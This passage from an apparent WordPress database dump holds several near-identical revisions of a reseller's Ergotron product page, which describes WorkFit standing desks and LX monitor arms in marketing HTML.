src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>2.Â WorkFit-TL, Standing Desk Workstation</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"40%\">\r\n      <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Presenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>3.Â WorkFit-S,Â Dual Workstation with Worksurface</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"40%\">\r\n      <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" />\r\n      </td>\r\n      <td>\r\n        This easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:55:49','2019-09-26 07:55:49','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3533,1,'2019-09-26 15:56:29','2019-09-26 07:56:29','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n\r\n\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"25%\">\r\n        <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>2.Â WorkFit-TL, Standing Desk Workstation</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"25%\">\r\n      <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Presenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>3.Â WorkFit-S,Â Dual Workstation with Worksurface</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"25%\">\r\n      <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" />\r\n      </td>\r\n      <td>\r\n        This easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:56:29','2019-09-26 07:56:29','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3534,1,'2019-09-26 16:02:55','2019-09-26 08:02:55','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n\r\n\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n        <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>2.Â WorkFit-TL, Standing Desk Workstation</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n      <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Presenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>3.Â WorkFit-S,Â Dual Workstation with Worksurface</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n      <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" />\r\n      </td>\r\n      <td>\r\n        This easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n\r\n<h3>1. LX Desk Monitor Arm</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n        <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>2.Â LX Dual Stacking Arm</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n        <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" />\r\n      </td>\r\n      <td>\r\n        Create a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>3.Â LX Wall Monitor Arm</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td>\r\n        <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n      </td>\r\n      <td>\r\n        Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h2>Product Benefits</h2>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 16:02:55','2019-09-26 08:02:55','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3535,1,'2019-09-26 16:05:25','2019-09-26 08:05:25','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n\r\n\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"25%\">\r\n        <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>2.Â WorkFit-TL, Standing Desk Workstation</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"25%\">\r\n      <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Presenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>3.Â WorkFit-S,Â Dual Workstation with Worksurface</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"25%\">\r\n      <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" />\r\n      </td>\r\n      <td>\r\n        This easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n\r\n<h3>1. LX Desk Monitor Arm</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"10%\">\r\n        <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>2.Â LX Dual Stacking Arm</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"10%\">\r\n        <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" />\r\n      </td>\r\n      <td>\r\n        Create a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>3.Â LX Wall Monitor Arm</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"10%\">\r\n        <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n      </td>\r\n      <td>\r\n        Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h2>Product Benefits</h2>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 16:05:25','2019-09-26 08:05:25','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3536,1,'2019-09-26 16:06:08','2019-09-26 08:06:08','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n\r\n\r\n<h3>1. WorkFit-Z Mini</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"25%\">\r\n        <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>2.Â WorkFit-TL, Standing Desk Workstation</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"25%\">\r\n      <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Presenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>3.Â WorkFit-S,Â Dual Workstation with Worksurface</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"25%\">\r\n      <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" />\r\n      </td>\r\n      <td>\r\n        This easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n\r\n<h3>1. LX Desk Monitor Arm</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"25%\">\r\n        <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\"/>\r\n      </td>\r\n      <td>\r\n        Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>2.Â LX Dual Stacking Arm</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"25%\">\r\n        <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" />\r\n      </td>\r\n      <td>\r\n        Create a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h3>3.Â LX Wall Monitor Arm</h3>\r\n<table width=\"100%\" border=\"1\">\r\n  <tbody>\r\n    <tr height=\"280px\">\r\n      <td width=\"25%\">\r\n        <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n      </td>\r\n      <td>\r\n        Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n      </td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h2>Product Benefits</h2>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 16:06:08','2019-09-26 08:06:08','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3537,1,'2019-09-26 16:41:31','2019-09-26 08:41:31','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n  <h1>Standing Desks</h1>\r\n  Sit less. Stand more. Feel the difference.\r\n\r\n\r\n  <h3>1. WorkFit-Z Mini</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â WorkFit-TL, Standing Desk Workstation</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n        <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Presenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â WorkFit-S,Â Dual Workstation with Worksurface</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n        <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          This easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h1>Mounts</h1>\r\n  Improve your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n\r\n  <h3>1. LX Desk Monitor Arm</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. 